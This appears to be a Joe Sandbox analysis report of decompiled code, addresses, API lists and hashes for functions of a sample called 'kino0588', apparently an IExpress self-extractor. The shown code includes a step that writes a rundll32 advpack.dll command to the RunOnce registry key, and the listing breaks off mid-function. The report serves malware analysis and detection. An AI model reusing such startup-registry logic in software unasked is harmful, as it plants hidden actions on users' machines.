				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x1988c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x1987a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x198598;
					_v36 = 1;
					_v32 = E00194200;
					_v28 = 0x1988c0;
					 *0x19a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x19a288(_t32, 0x1988c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x1988c0 != 0) {
							E00191680(0x1987a0, 0x104, 0x1988c0);
						}
						 *0x19a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x1987a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x1988c0);
					_t61 = 0x1988c0;
					_t4 =  &(_t61[1]); // 0x1988c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x1988c0; // 0x331181
					_t44 = CharPrevA(0x1988c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x1988c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                    0x00194234
                                                                                                                                                                                                                                    0x0019423c
                                                                                                                                                                                                                                    0x00194240
                                                                                                                                                                                                                                    0x001943b2
                                                                                                                                                                                                                                    0x001943b7
                                                                                                                                                                                                                                    0x001943c0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001943c5
                                                                                                                                                                                                                                    0x0019424c
                                                                                                                                                                                                                                    0x00194252
                                                                                                                                                                                                                                    0x00194257
                                                                                                                                                                                                                                    0x001943a4
                                                                                                                                                                                                                                    0x001943a5
                                                                                                                                                                                                                                    0x001943ab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001943ab
                                                                                                                                                                                                                                    0x00194263
                                                                                                                                                                                                                                    0x00194269
                                                                                                                                                                                                                                    0x0019426e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019427a
                                                                                                                                                                                                                                    0x00194280
                                                                                                                                                                                                                                    0x00194285
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019428d
                                                                                                                                                                                                                                    0x00194293
                                                                                                                                                                                                                                    0x001942e6
                                                                                                                                                                                                                                    0x001942e9
                                                                                                                                                                                                                                    0x001942ef
                                                                                                                                                                                                                                    0x001942f4
                                                                                                                                                                                                                                    0x001942f7
                                                                                                                                                                                                                                    0x00194300
                                                                                                                                                                                                                                    0x00194307
                                                                                                                                                                                                                                    0x0019430e
                                                                                                                                                                                                                                    0x00194315
                                                                                                                                                                                                                                    0x0019431c
                                                                                                                                                                                                                                    0x00194322
                                                                                                                                                                                                                                    0x00194326
                                                                                                                                                                                                                                    0x0019432d
                                                                                                                                                                                                                                    0x0019432d
                                                                                                                                                                                                                                    0x0019432f
                                                                                                                                                                                                                                    0x00194334
                                                                                                                                                                                                                                    0x00194343
                                                                                                                                                                                                                                    0x00194349
                                                                                                                                                                                                                                    0x0019434d
                                                                                                                                                                                                                                    0x00194354
                                                                                                                                                                                                                                    0x00194354
                                                                                                                                                                                                                                    0x0019435d
                                                                                                                                                                                                                                    0x0019436e
                                                                                                                                                                                                                                    0x0019436e
                                                                                                                                                                                                                                    0x0019437d
                                                                                                                                                                                                                                    0x00194383
                                                                                                                                                                                                                                    0x00194387
                                                                                                                                                                                                                                    0x0019438e
                                                                                                                                                                                                                                    0x0019438e
                                                                                                                                                                                                                                    0x00194387
                                                                                                                                                                                                                                    0x00194391
                                                                                                                                                                                                                                    0x00194399
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194295
                                                                                                                                                                                                                                    0x0019429f
                                                                                                                                                                                                                                    0x001942a5
                                                                                                                                                                                                                                    0x001942aa
                                                                                                                                                                                                                                    0x001942aa
                                                                                                                                                                                                                                    0x001942ad
                                                                                                                                                                                                                                    0x001942ad
                                                                                                                                                                                                                                    0x001942af
                                                                                                                                                                                                                                    0x001942b0
                                                                                                                                                                                                                                    0x001942b6
                                                                                                                                                                                                                                    0x001942c2
                                                                                                                                                                                                                                    0x001942c8
                                                                                                                                                                                                                                    0x001942ce
                                                                                                                                                                                                                                    0x001942e4
                                                                                                                                                                                                                                    0x001942e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001942ce

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00194236
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0019424C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00194263
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0019427A
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,001988C0,?,00000001), ref: 0019429F
                                                                                                                                                                                                                                    • CharPrevA.USER32(001988C0,00331181,?,00000001), ref: 001942C2
                                                                                                                                                                                                                                    • CharPrevA.USER32(001988C0,00000000,?,00000001), ref: 001942D6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00194391
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001943A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                    • Opcode ID: a4f639f58a595c43beb2dcd8d3a3120c83377f116dd2b1eace2259d73514a55e
                                                                                                                                                                                                                                    • Instruction ID: 84874c625658b7d33882ff167327d6c802c7778cd8fa3fc1b35b14fd69d2eaa5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4f639f58a595c43beb2dcd8d3a3120c83377f116dd2b1eace2259d73514a55e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C941D174E00214AFDF11AFB4EC98E6EBBB4FF46344F54016AE941A3251CB748D86C7A5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001944B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E001944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x198004; // 0x21bd9a3c
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x198a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x199a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00191680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0019171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0019171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0019681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E001967C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0019681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E001967C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00196CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                    0x001944b9
                                                                                                                                                                                                                                    0x001944c4
                                                                                                                                                                                                                                    0x001944cb
                                                                                                                                                                                                                                    0x001944d8
                                                                                                                                                                                                                                    0x001944e4
                                                                                                                                                                                                                                    0x001944eb
                                                                                                                                                                                                                                    0x001944ee
                                                                                                                                                                                                                                    0x001944ef
                                                                                                                                                                                                                                    0x001944ef
                                                                                                                                                                                                                                    0x001944f1
                                                                                                                                                                                                                                    0x001944f7
                                                                                                                                                                                                                                    0x001944f8
                                                                                                                                                                                                                                    0x0019467b
                                                                                                                                                                                                                                    0x001944fe
                                                                                                                                                                                                                                    0x00194509
                                                                                                                                                                                                                                    0x00194518
                                                                                                                                                                                                                                    0x00194525
                                                                                                                                                                                                                                    0x00194562
                                                                                                                                                                                                                                    0x00194568
                                                                                                                                                                                                                                    0x00194568
                                                                                                                                                                                                                                    0x0019456b
                                                                                                                                                                                                                                    0x0019456b
                                                                                                                                                                                                                                    0x0019456d
                                                                                                                                                                                                                                    0x0019456e
                                                                                                                                                                                                                                    0x00194572
                                                                                                                                                                                                                                    0x00194578
                                                                                                                                                                                                                                    0x0019457c
                                                                                                                                                                                                                                    0x001945cb
                                                                                                                                                                                                                                    0x00194607
                                                                                                                                                                                                                                    0x00194607
                                                                                                                                                                                                                                    0x0019460d
                                                                                                                                                                                                                                    0x00194613
                                                                                                                                                                                                                                    0x00194617
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019461d
                                                                                                                                                                                                                                    0x00194623
                                                                                                                                                                                                                                    0x00194626
                                                                                                                                                                                                                                    0x00194628
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194628
                                                                                                                                                                                                                                    0x001945cd
                                                                                                                                                                                                                                    0x001945cd
                                                                                                                                                                                                                                    0x001945cf
                                                                                                                                                                                                                                    0x001945cf
                                                                                                                                                                                                                                    0x001945d2
                                                                                                                                                                                                                                    0x001945d2
                                                                                                                                                                                                                                    0x001945d4
                                                                                                                                                                                                                                    0x001945d5
                                                                                                                                                                                                                                    0x001945db
                                                                                                                                                                                                                                    0x001945de
                                                                                                                                                                                                                                    0x001945e3
                                                                                                                                                                                                                                    0x001945e9
                                                                                                                                                                                                                                    0x001945ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001945f3
                                                                                                                                                                                                                                    0x001945fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194602
                                                                                                                                                                                                                                    0x001945ed
                                                                                                                                                                                                                                    0x0019457e
                                                                                                                                                                                                                                    0x0019457e
                                                                                                                                                                                                                                    0x00194580
                                                                                                                                                                                                                                    0x00194580
                                                                                                                                                                                                                                    0x00194583
                                                                                                                                                                                                                                    0x00194583
                                                                                                                                                                                                                                    0x00194585
                                                                                                                                                                                                                                    0x00194586
                                                                                                                                                                                                                                    0x0019458a
                                                                                                                                                                                                                                    0x0019458c
                                                                                                                                                                                                                                    0x0019458f
                                                                                                                                                                                                                                    0x0019458f
                                                                                                                                                                                                                                    0x00194591
                                                                                                                                                                                                                                    0x00194592
                                                                                                                                                                                                                                    0x0019459b
                                                                                                                                                                                                                                    0x0019459e
                                                                                                                                                                                                                                    0x001945a3
                                                                                                                                                                                                                                    0x001945a9
                                                                                                                                                                                                                                    0x001945ad
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001945af
                                                                                                                                                                                                                                    0x001945af
                                                                                                                                                                                                                                    0x001945bf
                                                                                                                                                                                                                                    0x0019462d
                                                                                                                                                                                                                                    0x00194630
                                                                                                                                                                                                                                    0x0019463d
                                                                                                                                                                                                                                    0x0019464e
                                                                                                                                                                                                                                    0x0019464e
                                                                                                                                                                                                                                    0x0019463f
                                                                                                                                                                                                                                    0x00194640
                                                                                                                                                                                                                                    0x00194647
                                                                                                                                                                                                                                    0x0019464c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019464c
                                                                                                                                                                                                                                    0x00194666
                                                                                                                                                                                                                                    0x0019466d
                                                                                                                                                                                                                                    0x0019466f
                                                                                                                                                                                                                                    0x00194675
                                                                                                                                                                                                                                    0x00194675
                                                                                                                                                                                                                                    0x001945ad
                                                                                                                                                                                                                                    0x00194527
                                                                                                                                                                                                                                    0x0019452e
                                                                                                                                                                                                                                    0x0019453f
                                                                                                                                                                                                                                    0x0019453f
                                                                                                                                                                                                                                    0x00194530
                                                                                                                                                                                                                                    0x00194531
                                                                                                                                                                                                                                    0x00194538
                                                                                                                                                                                                                                    0x0019453d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019453d
                                                                                                                                                                                                                                    0x00194554
                                                                                                                                                                                                                                    0x0019455a
                                                                                                                                                                                                                                    0x0019455a
                                                                                                                                                                                                                                    0x0019455a
                                                                                                                                                                                                                                    0x00194525
                                                                                                                                                                                                                                    0x0019468c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001945A3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001945E3
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0019460D
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00194630
                                                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 00194666
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0019466F
                                                                                                                                                                                                                                      • Part of subcall function 0019681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0019686E
                                                                                                                                                                                                                                      • Part of subcall function 0019681F: GetSystemMetrics.USER32(0000004A), ref: 001968A7
                                                                                                                                                                                                                                      • Part of subcall function 0019681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001968CC
                                                                                                                                                                                                                                      • Part of subcall function 0019681F: RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,?,0000000C), ref: 001968F4
                                                                                                                                                                                                                                      • Part of subcall function 0019681F: RegCloseKey.ADVAPI32(?), ref: 00196902
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$doza2
                                                                                                                                                                                                                                    • API String ID: 3244514340-3130468218
                                                                                                                                                                                                                                    • Opcode ID: 026c37637e73c64bae36e2fe1913d4719c42b5a0e1c4299526cbb30cf69046f3
                                                                                                                                                                                                                                    • Instruction ID: c98adcf7f07deb83c0fd862b0c8d26dafdfca78eff8ec24c3c824616fa155ef0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 026c37637e73c64bae36e2fe1913d4719c42b5a0e1c4299526cbb30cf69046f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05510472900215ABDF219F68CC48FBA7B79EF46300F1541A5FD49A7241DB31DE4ACBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00192773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x198004; // 0x21bd9a3c
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00191781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0019658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0019658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x191140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00191680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00196CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}























                                                                                                                                                                                                                                    0x00192773
                                                                                                                                                                                                                                    0x0019277e
                                                                                                                                                                                                                                    0x00192785
                                                                                                                                                                                                                                    0x0019278a
                                                                                                                                                                                                                                    0x0019278d
                                                                                                                                                                                                                                    0x00192790
                                                                                                                                                                                                                                    0x00192792
                                                                                                                                                                                                                                    0x00192798
                                                                                                                                                                                                                                    0x0019279d
                                                                                                                                                                                                                                    0x001928b2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001927a3
                                                                                                                                                                                                                                    0x001927a3
                                                                                                                                                                                                                                    0x001927af
                                                                                                                                                                                                                                    0x001927c2
                                                                                                                                                                                                                                    0x001927c8
                                                                                                                                                                                                                                    0x001927cd
                                                                                                                                                                                                                                    0x001927d5
                                                                                                                                                                                                                                    0x001928b7
                                                                                                                                                                                                                                    0x001928b9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001927db
                                                                                                                                                                                                                                    0x001927dd
                                                                                                                                                                                                                                    0x001928aa
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001927e3
                                                                                                                                                                                                                                    0x001927e3
                                                                                                                                                                                                                                    0x001927ec
                                                                                                                                                                                                                                    0x001927f8
                                                                                                                                                                                                                                    0x00192803
                                                                                                                                                                                                                                    0x0019280b
                                                                                                                                                                                                                                    0x00192831
                                                                                                                                                                                                                                    0x001928c3
                                                                                                                                                                                                                                    0x001928c9
                                                                                                                                                                                                                                    0x001928cd
                                                                                                                                                                                                                                    0x00192837
                                                                                                                                                                                                                                    0x0019285a
                                                                                                                                                                                                                                    0x0019285c
                                                                                                                                                                                                                                    0x00192865
                                                                                                                                                                                                                                    0x00192892
                                                                                                                                                                                                                                    0x00192895
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192867
                                                                                                                                                                                                                                    0x00192878
                                                                                                                                                                                                                                    0x0019288c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019287a
                                                                                                                                                                                                                                    0x00192880
                                                                                                                                                                                                                                    0x00192885
                                                                                                                                                                                                                                    0x00192897
                                                                                                                                                                                                                                    0x00192899
                                                                                                                                                                                                                                    0x00192899
                                                                                                                                                                                                                                    0x00192878
                                                                                                                                                                                                                                    0x00192865
                                                                                                                                                                                                                                    0x001928a0
                                                                                                                                                                                                                                    0x001928bf
                                                                                                                                                                                                                                    0x001928c1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001928c1
                                                                                                                                                                                                                                    0x00192831
                                                                                                                                                                                                                                    0x001927dd
                                                                                                                                                                                                                                    0x001927d5
                                                                                                                                                                                                                                    0x001928e5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharUpperA.USER32(21BD9A3C,00000000,00000000,00000000), ref: 001927A8
                                                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 001927B5
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 001927BC
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192829
                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00191140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192852
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00192870
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001928A0
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001928AA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 001928B9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001927E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                    • Opcode ID: babb4de967b8c46bfc525f747231ba40f46acd715997f363614e55fc4f78b590
                                                                                                                                                                                                                                    • Instruction ID: 383a8234aaeca7e35423bd0170d949d946dcb89d701cceb7d4ebcc34d4606f61
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: babb4de967b8c46bfc525f747231ba40f46acd715997f363614e55fc4f78b590
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77419071E00128BFDF249B649C85AFA7BBDEF55700F5440AAFA49D2110DB709EC68FA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E00192267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x198004; // 0x21bd9a3c
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x198530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0019658A( &_v268, 0x104, 0x191140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E0019171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
